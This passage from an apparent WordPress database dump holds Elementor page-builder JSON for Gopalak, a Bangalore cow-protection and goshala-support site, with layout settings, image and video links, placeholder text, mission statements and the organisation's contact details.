\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9720,1636,'_elementor_page_assets','a:0:{}'),(9721,1637,'_elementor_edit_mode','builder'),(9722,1637,'_elementor_template_type','wp-page'),(9723,1637,'_elementor_version','3.7.8'),(9724,1637,'_wp_page_template','elementor_canvas'),(9725,1637,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\